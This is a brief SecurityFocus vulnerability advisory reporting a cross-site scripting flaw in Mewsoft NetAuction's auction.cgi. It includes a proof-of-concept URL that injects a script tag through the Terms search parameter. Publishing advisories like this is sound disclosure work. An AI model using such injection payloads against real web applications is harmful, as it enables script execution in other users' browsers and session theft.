Mewsoft NetAuction Cross Site Scripting Vulnerability

The following proof of concept was provided by "[windows-1256] § o m e 1" <exe@FlashMail.com>:

http://www.xxxx.com/cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search
&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('OopS');</script>&
Where=&Sort=Photo&Dir=


 

Privacy Statement
Copyright 2010, SecurityFocus